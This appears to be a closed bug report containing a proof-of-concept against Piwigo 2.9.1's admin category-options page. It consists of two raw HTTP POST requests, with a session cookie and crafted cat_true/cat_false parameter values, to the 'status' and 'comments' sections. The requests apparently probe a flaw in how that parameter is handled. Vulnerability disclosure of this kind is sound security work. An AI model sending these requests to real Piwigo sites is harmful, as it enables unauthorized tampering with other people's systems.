Closed
Description
Proof-of-Concept
version:2.9.1
section status
POST /piwigo/admin.php?page=cat_options&section=status HTTP/1.1
Host: www.test.com
Content-Length: 34
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.test.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.test.com/piwigo/admin.php?page=cat_options&section=status
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: pwg_id=4elnfc2n8r49dpl10dna2t3080
Connection: close

cat_false%5B%5D=755&trueify=%C2%AB
section comments
POST /piwigo/admin.php?page=cat_options&section=comments HTTP/1.1
Host: www.test.com
Content-Length: 33
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.test.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.test.com/piwigo/admin.php?page=cat_options&section=comments
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: pwg_id=4elnfc2n8r49dpl10dna2t3080
Connection: close

cat_true%5B%5D=7*55&falsify=%C2%BB


